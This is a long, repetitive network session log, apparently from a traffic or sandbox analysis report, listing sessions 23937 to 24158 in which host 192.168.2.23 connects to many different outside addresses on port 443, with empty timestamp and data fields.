                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23937192.168.2.2352390189.169.187.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23938192.168.2.233633827.131.149.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23939192.168.2.23567588.35.205.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23940192.168.2.2347872209.58.218.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23941192.168.2.233782894.101.18.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23942192.168.2.2358498145.220.18.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23943192.168.2.234719863.229.46.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23944192.168.2.2355248154.183.215.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23945192.168.2.2360042166.103.107.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23946192.168.2.233754466.39.225.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23947192.168.2.233924654.121.156.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23948192.168.2.2357148155.86.23.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23949192.168.2.2334066102.197.49.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23950192.168.2.2352996204.185.203.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23951192.168.2.233892068.114.66.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23952192.168.2.2357452191.188.65.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23953192.168.2.23546365.18.130.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23954192.168.2.235754676.108.170.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23955192.168.2.2333808142.126.17.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23956192.168.2.2348016113.95.96.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23957192.168.2.2341638176.154.229.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23958192.168.2.2339612143.53.68.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23959192.168.2.235264479.105.83.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23960192.168.2.2348348140.197.224.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23961192.168.2.2335032193.213.246.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23962192.168.2.2355602128.243.150.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23963192.168.2.2338610178.205.28.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23964192.168.2.2359828190.198.185.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23965192.168.2.23515069.255.162.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23966192.168.2.233390463.214.194.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23967192.168.2.235391831.144.168.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23968192.168.2.2351770111.74.253.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23969192.168.2.235584892.184.180.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23970192.168.2.2345978193.133.211.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23971192.168.2.235930491.112.109.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23972192.168.2.2341854199.127.65.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23973192.168.2.2347456184.193.180.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23974192.168.2.2356830168.139.161.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23975192.168.2.234275491.119.80.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23976192.168.2.2351360180.84.50.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23977192.168.2.235763261.102.185.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23978192.168.2.23374402.190.20.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23979192.168.2.236062894.148.17.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23980192.168.2.2344378116.31.14.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23981192.168.2.2337982203.190.189.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23982192.168.2.2338486104.14.213.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23983192.168.2.2335818132.172.57.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23984192.168.2.233528460.224.66.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23985192.168.2.235105441.9.226.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23986192.168.2.23469525.16.63.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23987192.168.2.2333236199.21.148.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23988192.168.2.2349092185.96.12.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23989192.168.2.234821265.206.114.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23990192.168.2.2339708114.192.154.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23991192.168.2.2346526218.132.106.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23992192.168.2.234145085.168.93.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23993192.168.2.23563308.121.154.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23994192.168.2.2334646186.32.214.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23995192.168.2.2340874203.54.75.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23996192.168.2.236018493.255.115.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23997192.168.2.234307249.141.100.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23998192.168.2.23505168.148.131.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23999192.168.2.235900819.104.75.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24000192.168.2.235502093.57.59.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24001192.168.2.2358800103.189.67.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24002192.168.2.2335906162.120.223.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24003192.168.2.2352696188.165.133.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24004192.168.2.235392249.93.198.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24005192.168.2.2348760159.47.32.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24006192.168.2.235807488.35.229.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24007192.168.2.2358520130.1.46.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24008192.168.2.235698258.164.202.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24009192.168.2.235740285.150.131.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24010192.168.2.2337016132.16.127.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24011192.168.2.235801049.114.124.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24012192.168.2.2348718154.16.129.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24013192.168.2.2341310126.100.80.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24014192.168.2.236018437.111.217.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24015192.168.2.2338722120.194.6.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24016192.168.2.233691044.87.252.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24017192.168.2.2343492178.202.41.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24018192.168.2.2343652155.177.242.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24019192.168.2.2359248146.5.225.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24020192.168.2.234963681.141.49.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24021192.168.2.235350254.168.227.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24022192.168.2.2354320182.176.208.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24023192.168.2.2355474205.174.151.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24024192.168.2.2337006198.157.16.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24025192.168.2.2354152123.139.121.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24026192.168.2.233977087.45.158.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24027192.168.2.234321676.100.123.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24028192.168.2.2338040210.181.15.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24029192.168.2.2360120192.38.65.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24030192.168.2.235030846.109.154.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24031192.168.2.2351066102.17.147.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24032192.168.2.235609451.80.142.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24033192.168.2.2356486217.143.208.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24034192.168.2.234802668.166.121.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24035192.168.2.2351752167.233.21.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24036192.168.2.2339688223.89.190.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24037192.168.2.234600467.168.16.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24038192.168.2.2341334180.40.66.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24039192.168.2.2350608181.222.78.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24040192.168.2.235924642.161.38.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24041192.168.2.235763249.217.210.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24042192.168.2.2344582110.156.233.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24043192.168.2.234501838.114.159.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24044192.168.2.2346208159.79.239.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24045192.168.2.235223031.50.121.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24046192.168.2.2344788142.197.146.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24047192.168.2.2349430137.66.41.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24048192.168.2.233483220.64.245.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24049192.168.2.2354400151.40.190.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24050192.168.2.2346634135.58.210.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24051192.168.2.2352058128.70.190.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24052192.168.2.2358892145.73.90.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24053192.168.2.233896868.128.214.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24054192.168.2.2337442213.97.197.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24055192.168.2.2350000150.92.229.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24056192.168.2.233804663.111.214.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24057192.168.2.2348416195.36.133.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24058192.168.2.2354692164.73.111.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24059192.168.2.2348628195.250.126.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24060192.168.2.2336918217.188.181.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24061192.168.2.235062219.129.133.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24062192.168.2.236005464.70.23.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24063192.168.2.2346542151.148.192.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24064192.168.2.2342096167.117.128.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24065192.168.2.2347634193.71.235.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24066192.168.2.235822837.125.139.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24067192.168.2.23581301.29.103.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24068192.168.2.235750669.117.48.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24069192.168.2.234869814.214.8.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24070192.168.2.2358454181.39.209.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24071192.168.2.2352814199.222.218.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24072192.168.2.2333614147.79.161.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24073192.168.2.2350686178.211.89.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24074192.168.2.2336134106.198.255.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24075192.168.2.2335192176.193.202.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24076192.168.2.2332870210.164.34.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24077192.168.2.235670448.11.110.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24078192.168.2.234971414.172.110.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24079192.168.2.2348252208.109.77.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24080192.168.2.233640074.82.38.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24081192.168.2.235497095.104.247.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24082192.168.2.2342978153.204.200.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24083192.168.2.235797884.17.251.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24084192.168.2.235924848.124.12.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24085192.168.2.235236475.162.82.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24086192.168.2.234979878.249.118.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24087192.168.2.2343526205.4.148.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24088192.168.2.2342948121.227.232.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24089192.168.2.2343506126.199.13.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24090192.168.2.2336546222.197.40.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24091192.168.2.234549843.88.50.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24092192.168.2.2345188153.72.176.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24093192.168.2.2336342151.91.126.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24094192.168.2.2356146165.196.45.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24095192.168.2.2350826108.166.245.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24096192.168.2.2346240123.235.198.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24097192.168.2.235358013.98.224.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24098192.168.2.234322869.136.135.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24099192.168.2.2356564114.80.128.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24100192.168.2.234385071.40.127.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24101192.168.2.234798849.140.124.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24102192.168.2.2346880105.87.145.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24103192.168.2.234731080.23.253.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24104192.168.2.23435469.60.119.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24105192.168.2.233707680.81.158.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24106192.168.2.2355966129.36.237.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24107192.168.2.2335504142.97.255.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24108192.168.2.233834044.110.28.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24109192.168.2.234856299.49.206.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24110192.168.2.235261881.141.120.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24111192.168.2.235686632.77.235.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24112192.168.2.233977853.5.252.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24113192.168.2.2357484168.17.201.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24114192.168.2.234577077.136.245.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24115192.168.2.2339234193.20.106.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24116192.168.2.2338424142.17.127.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24117192.168.2.235816868.100.142.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24118192.168.2.233747041.148.130.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24119192.168.2.235241091.17.27.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24120192.168.2.2339268222.210.9.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24121192.168.2.2356856118.63.79.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24122192.168.2.2355576133.121.118.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24123192.168.2.235335812.255.18.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24124192.168.2.2356916186.76.119.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24125192.168.2.234200281.82.61.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24126192.168.2.2345672159.11.215.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24127192.168.2.235820698.202.46.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24128192.168.2.23560544.252.108.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24129192.168.2.234991668.227.249.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24130192.168.2.2355002183.212.87.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24131192.168.2.2348394182.151.159.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24132192.168.2.235666832.60.172.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24133192.168.2.2338228218.94.9.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24134192.168.2.2350522168.211.229.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24135192.168.2.234781027.31.168.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24136192.168.2.2357324178.128.198.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24137192.168.2.2332894142.31.240.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24138192.168.2.2347528167.195.25.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24139192.168.2.2334404212.205.46.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24140192.168.2.235339220.48.12.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24141192.168.2.2357420163.162.130.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24142192.168.2.2357718113.23.35.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24143192.168.2.234130692.60.189.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24144192.168.2.2342410217.142.23.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24145192.168.2.234709812.104.71.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24146192.168.2.235372694.77.33.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24147192.168.2.235707635.43.201.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24148192.168.2.2356516144.5.28.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24149192.168.2.235193020.25.14.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24150192.168.2.2354448142.24.238.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24151192.168.2.2340052196.28.25.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24152192.168.2.234592495.87.219.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24153192.168.2.2349350217.14.135.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24154192.168.2.23462201.121.211.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24155192.168.2.235237060.112.146.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24156192.168.2.2343712209.66.56.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24157192.168.2.2341902167.117.156.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24158192.168.2.234812440.164.155.83443
                                                TimestampBytes transferredDirectionData


